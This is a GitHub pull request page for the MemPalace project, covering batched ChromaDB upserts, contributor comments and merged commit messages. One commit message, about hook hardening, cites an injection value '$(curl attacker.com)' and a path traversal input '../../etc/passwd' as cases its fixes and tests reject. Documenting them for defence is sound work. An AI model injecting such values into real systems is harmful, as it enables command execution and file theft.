fix: batch upserts in miner to prevent ChromaDB 1.5.x compaction crashes by IzmanIzy · Pull Request #796 · MemPalace/mempalace

IzmanIzy · 2026-04-13T11:43:47Z

Summary

Batch all chunks per file into a single collection.upsert() call instead of upserting each chunk individually. This reduces WAL write pressure that causes the Rust compactor in ChromaDB >= 1.5 to crash.
Add periodic checkpoints (every 200 files) that release and re-acquire the collection, giving the compactor time to flush background work.
Release collection reference at the end of mining for a clean shutdown.

Problem

When mining projects with 100+ files, the miner issues thousands of individual upserts. On ChromaDB 1.5.x this causes:

Segfault (exit code 139) — the Rust compactor corrupts the metadata segment during concurrent individual writes
InternalError: Failed to apply logs to the metadata segment — WAL entries accumulate faster than compaction can process them

Both errors are intermittent and depend on project size, making them hard to reproduce in small test suites but consistent on real-world knowledge bases (300+ files).

Root Cause

ChromaDB's Rust compactor (introduced in 1.5.x) runs in a background thread. Individual upserts create one WAL entry each, and 2000+ entries in rapid succession overwhelm the compactor's ability to merge them atomically. The previous code already had a comment about hnswlib's thread-unsafe updatePoint path causing segfaults on macOS ARM — this is the same class of bug on the compaction side, now affecting all platforms.

Testing

37 existing miner tests pass (pytest tests/ -k "mine" — 37 passed, 0 failed)
Verified on a real 406-file knowledge base (3026 drawers) with ChromaDB 1.5.7 — zero crashes, clean completion with two checkpoint flushes at file 200 and 400
Lint (ruff check) and format (ruff format --check) pass
No changes to public API or CLI interface

Test plan

ruff check . passes
ruff format --check . passes
pytest tests/ -v --ignore=tests/benchmarks -k "mine" — 37 passed
Manual test: mine 406-file project with ChromaDB 1.5.7 — 3026 drawers, 0 crashes
Verify re-mining (modified files) still works correctly
Test with ChromaDB 0.6.x to confirm backward compatibility

🤖 Generated with Claude Code

jphein · 2026-04-13T14:35:21Z

This addresses the same WAL pressure issue we tackled in #629 — worth noting that PR also adds bulk mtime pre-fetch (bulk_check_mined()) and optional concurrent mining via --workers. The single-file batch approach here is cleaner for a targeted fix though. Might be worth coordinating so the two PRs don't conflict — happy to rebase #629 on top of this if it merges first.

IzmanIzy · 2026-04-13T15:47:43Z

This addresses the same WAL pressure issue we tackled in #629 — worth noting that PR also adds bulk mtime pre-fetch (bulk_check_mined()) and optional concurrent mining via --workers. The single-file batch approach here is cleaner for a targeted fix though. Might be worth coordinating so the two PRs don't conflict — happy to rebase #629 on top of this if it merges first.

…etic injection save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace#809

…h test - _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log - Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform - Add test verifying the warning log is emitted on rejection Refs: MemPalace#809

Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README.

) sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names.

When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes MemPalace#14.

Addresses review feedback on MemPalace#604: - Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere. - Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml.

fix: allow mining directories without local mempalace.yaml

…ction fix: harden hooks against shell injection, path traversal, and arithmetic injection

Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in MemPalace#877). Also update the April 11 follow-up section to match so the two notices no longer contradict each other.

…y-increase Increase visibility of fake website caution

…ze-punctuation fix: use permissive validator for KG entity values

Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution. Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>

…Palace#871) export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat export MEMPAL_VERBOSE=false → silent background save (default) Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work. TDD: tests written first, failed, code fixed, tests pass. Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml. Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x.

…ompilation-15578943484596502942 ⚡ Optimize regex compilation in entity extraction

feat: add VSCode devcontainer matching CI environment

… KnowledgeGraph

Closes MemPalace#872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

fix: add missing self._lock to query_relationship, timeline, and stats in KnowledgeGraph

…sion fix: replace invalid 'decision: allow' with {} in hooks (closes MemPalace#872)

TDD: test first, failed, fixed, passed. Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock. Closes MemPalace#883. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

fix: add lock to KG close() — last missing lock (closes MemPalace#883)

The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions. Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency. Both longmemeval_bench.py and locomo_bench.py: - llm_rerank*() gain backend= / base_url= kwargs - CLI: --llm-backend {anthropic,ollama}, --llm-base-url - API key required only when backend=anthropic (diary/palace modes still require it) - Parse last integer in response (reasoning models emit multi-int output) - Fallback to message.reasoning when content is empty - Raise max_tokens to 1024 for reasoning models

Addresses MemPalace#875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split). Scorecard — all reproduce exactly: LongMemEval raw R@5 96.6% (500/500) ✅ hybrid_v4 held-out 450 R@5 98.4% (442/450) ✅ hybrid_v4 + minimax rerank R@5 99.2% (496/500) * hybrid_v4 + minimax rerank R@10 100.0% (500/500) * LoCoMo (session, top-10) raw 60.3% (1986q) ✅ hybrid v5 88.9% (1986q) ✅ ConvoMem all-categories (250 items) 92.9% ✅ MemBench all-categories (8500) 80.3% ✅ * The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test. The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end.

…tion benchmarks: v3.3.0 reproduction results + Ollama rerank backend

@IzmanIzy

Adapts the approach from @IzmanIzy's PR MemPalace#796 to current develop, which diverged after that PR was opened — ``add_drawer`` now populates additional metadata fields (``normalize_version``, ``hall``, ``entities``, ``source_mtime``) that a verbatim rebase of MemPalace#796 would have regressed. Changes: - Extract ``_build_drawer_payload()`` helper — single source of truth for drawer ID + metadata construction, shared by ``add_drawer`` (single drawer, kept as a thin wrapper for backwards compat with tests) and ``process_file`` (batched per-file path). - ``process_file`` now accumulates all chunks from one file into batch lists and issues a single ``collection.upsert()`` call with them all, instead of one upsert per chunk. Preserves every metadata field ``add_drawer`` sets, including the ones added after MemPalace#796 was opened. - ``mine()`` adds a periodic checkpoint every 200 files that releases and re-acquires the collection (and closets collection), letting the Rust compactor flush buffered WAL entries between batches. - ``mine()`` releases both collection references at the end of mining so the final WAL entries flush cleanly before the process exits. ## Problem A typical project mine issues thousands of individual ``col.upsert()`` calls. ChromaDB 1.5.x's Rust compactor runs concurrently with writes and falls behind under this pattern, surfacing as: - ``Segfault (exit 139)`` — the compactor corrupts the metadata segment during concurrent individual writes - ``chromadb.errors.InternalError: Error in compaction: Failed to apply logs to the metadata segment`` - Later reads crash with ``mismatched types; Rust type u64 (as SQL type INTEGER) is not compatible with SQL type BLOB`` — the compactor left half-migrated rows with ``seq_id`` values still stored as BLOB instead of decoded to INTEGER ## Scope ``tests/test_miner.py::test_add_drawer`` and ``tests/test_hall_detection.py::test_add_drawer_includes_hall`` both call ``miner.add_drawer()`` directly and expect ``True`` + a single drawer with full metadata. Both pass with the backwards-compat wrapper. Related: MemPalace#796 (original PR, now has develop conflicts), MemPalace#899 (MCP server library staleness — the other vector that creates compaction crashes upstream of this fix). Co-Authored-By: IzmanIzy <noreply@github.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

messelink · 2026-04-15T03:26:38Z

Hi @IzmanIzy — I hit the exact compaction crash this PR fixes while mining into an existing palace that had accumulated BLOB-typed seq_id rows from a stale long-running MCP server (see #899 for that adjacent bug). The batching approach here solved my immediate problem, so thank you for writing it up.

I wanted to flag that this PR has a non-trivial rebase conflict against current develop: since it was opened, add_drawer() on develop has grown three new metadata fields that your PR's inlined version in process_file() doesn't reproduce — a verbatim cherry-pick would silently regress them. Specifically:

normalize_version (from palace.NORMALIZE_VERSION)
hall (from detect_hall(content))
entities (from _extract_entities_for_metadata(content))

The source_mtime try/except is also now in the common path.

I rebased your approach onto current develop and adapted it to preserve those fields. Rather than inlining metadata construction in process_file(), I extracted a _build_drawer_payload() helper and kept add_drawer() as a thin single-drawer wrapper (for backwards compat with the tests/test_miner.py::test_add_drawer and tests/test_hall_detection.py::test_add_drawer_includes_hall tests, which call add_drawer directly and check for normalize_version / hall in the stored metadata). The batched per-file upsert and the periodic checkpoint logic are kept as you wrote them.

Commit: messelink/mempalace@9cc1365
Branch: messelink:fix/batch-upsert-chromadb-compaction (clean off current upstream/develop)

Test I ran

A delete-and-remine of a 20-file subtree (mix of markdown docs and chat transcripts) into an existing ~14.8k-drawer palace. Result: 1,324 drawers filed in a single end-to-end run without any compaction errors. The largest single-file batch was 618 drawers in one collection.upsert() call — exactly the stress case your PR targets. Search against the re-mined content works correctly afterward.

Previously (without the batching), the same mine crashed with Error in compaction: Error reading from metadata segment reader: error occurred while decoding column 0: mismatched types; Rust type u64 (as SQL type INTEGER) is not compatible with SQL type BLOB on the first upsert, and I lost a chunk of drawers to silent file-already-mined skipping on retry.

How to proceed

Totally your call — I don't want to step on your PR. Three options:

You fetch my branch and apply it to yours — git fetch https://github.com/messelink/mempalace.git fix/batch-upsert-chromadb-compaction && git reset --hard FETCH_HEAD on your local fix/batch-upsert-chromadb-compaction, then force-push. Cleanest attribution (your PR, just rebased). The commit already credits you as Co-Authored-By.
You enable "Allow edits from maintainers" on this PR, and I can't push directly (I'm not a maintainer of milla-jovovich/mempalace), but one of the maintainers could push my patch to your branch.
If you're unavailable or prefer, I'm happy to open a separate PR that supersedes this one, credits you, and links back here.

Let me know which you prefer. Happy to wait a few days for a reply before doing option 3.

cc @milla-jovovich for awareness — this PR becomes unblocked with the rebase.

bensig · 2026-04-15T05:47:10Z

hey @IzmanIzy — this conflicts with develop now. pls rebase and we can merge. thanks!

bensig · 2026-04-15T05:48:24Z

@IzmanIzy pls check conflict

messelink · 2026-04-15T07:10:14Z

@bensig — just flagging that my comment above (03:26 UTC) has the rebased version ready if it helps move this along. Branch: messelink:fix/batch-upsert-chromadb-compaction, clean off current develop. Up to @IzmanIzy whether they want to pull it into their branch or I open a new PR.

IzmanIzy · 2026-04-15T14:15:26Z

Rebased onto current develop using @messelink's cleaned-up version (thanks! 🙏). Conflict resolved, ready to merge.

@bensig good to go.

IzmanIzy requested review from bensig and milla-jovovich as code owners April 13, 2026 11:43

igorls added area/mining File and conversation mining bug Something isn't working labels Apr 14, 2026

Kesshite and others added 24 commits April 14, 2026 07:54

Increase visibility of fake website caution

1bff7d9

Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README.

fix: remove unused sys import

a035293

Merge pull request MemPalace#604 from mvanhorn/fix/14-mine-no-yaml

6378588

fix: allow mining directories without local mempalace.yaml

Merge pull request MemPalace#812 from Kesshite/fix/security-hook-inje…

e1d24d8

…ction fix: harden hooks against shell injection, path traversal, and arithmetic injection

Merge pull request MemPalace#869 from gbhat618/fake-website-visibilit…

8630e7e

…y-increase Increase visibility of fake website caution

Merge pull request MemPalace#873 from sha2fiddy/feature/455/kg-saniti…

4741bc0

…ze-punctuation fix: use permissive validator for KG entity values

perf: optimize regex compilation in entity extraction

21793cf

Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution. Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>

Merge pull request MemPalace#880 from MemPalace/perf-optimize-regex-c…

c9b3245

…ompilation-15578943484596502942 ⚡ Optimize regex compilation in entity extraction

Merge pull request MemPalace#881 from MemPalace/feat/devcontainer

a3f4674

feat: add VSCode devcontainer matching CI environment

fix: add missing self._lock to query_relationship, timeline, stats in…

1fa0e57

… KnowledgeGraph

Merge pull request MemPalace#884 from shafdev/fix/kg-missing-lock

0369227

fix: add missing self._lock to query_relationship, timeline, and stats in KnowledgeGraph

Merge pull request MemPalace#885 from MemPalace/fix/hook-invalid-deci…

205867a

…sion fix: replace invalid 'decision: allow' with {} in hooks (closes MemPalace#872)

Merge pull request MemPalace#887 from MemPalace/fix/kg-close-lock

29bc868

fix: add lock to KG close() — last missing lock (closes MemPalace#883)

igorls added 3 commits April 14, 2026 21:20

benchmarks: apply ruff-format to llm_rerank (trivial line wrap)

ca0682a

Merge pull request MemPalace#895 from MemPalace/bench/v3.3.0-verifica…

db4c52e

…tion benchmarks: v3.3.0 reproduction results + Ollama rerank backend

messelink mentioned this pull request Apr 15, 2026

MCP server silently serves with stale library versions after package upgrade #899

Open

IzmanIzy force-pushed the fix/batch-upsert-chromadb-compaction branch from f15bffd to 9cc1365 Compare April 15, 2026 14:11

IzmanIzy requested a review from igorls as a code owner April 15, 2026 14:11

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix: batch upserts in miner to prevent ChromaDB 1.5.x compaction crashes#796

fix: batch upserts in miner to prevent ChromaDB 1.5.x compaction crashes#796
IzmanIzy wants to merge 28 commits intoMemPalace:mainfrom
IzmanIzy:fix/batch-upsert-chromadb-compaction

IzmanIzy commented Apr 13, 2026

Uh oh!

jphein commented Apr 13, 2026

Uh oh!

IzmanIzy commented Apr 13, 2026

Uh oh!

messelink commented Apr 15, 2026 •

edited

Loading

Uh oh!

bensig commented Apr 15, 2026

Uh oh!

bensig commented Apr 15, 2026

Uh oh!

messelink commented Apr 15, 2026

Uh oh!

IzmanIzy commented Apr 15, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

11 participants

Conversation

IzmanIzy commented Apr 13, 2026

Summary

Problem

Root Cause

Testing

Test plan

Uh oh!

jphein commented Apr 13, 2026

Uh oh!

IzmanIzy commented Apr 13, 2026

Uh oh!

messelink commented Apr 15, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Test I ran

How to proceed

Uh oh!

bensig commented Apr 15, 2026

Uh oh!

bensig commented Apr 15, 2026

Uh oh!

messelink commented Apr 15, 2026

Uh oh!

IzmanIzy commented Apr 15, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

11 participants

messelink commented Apr 15, 2026 •

edited

Loading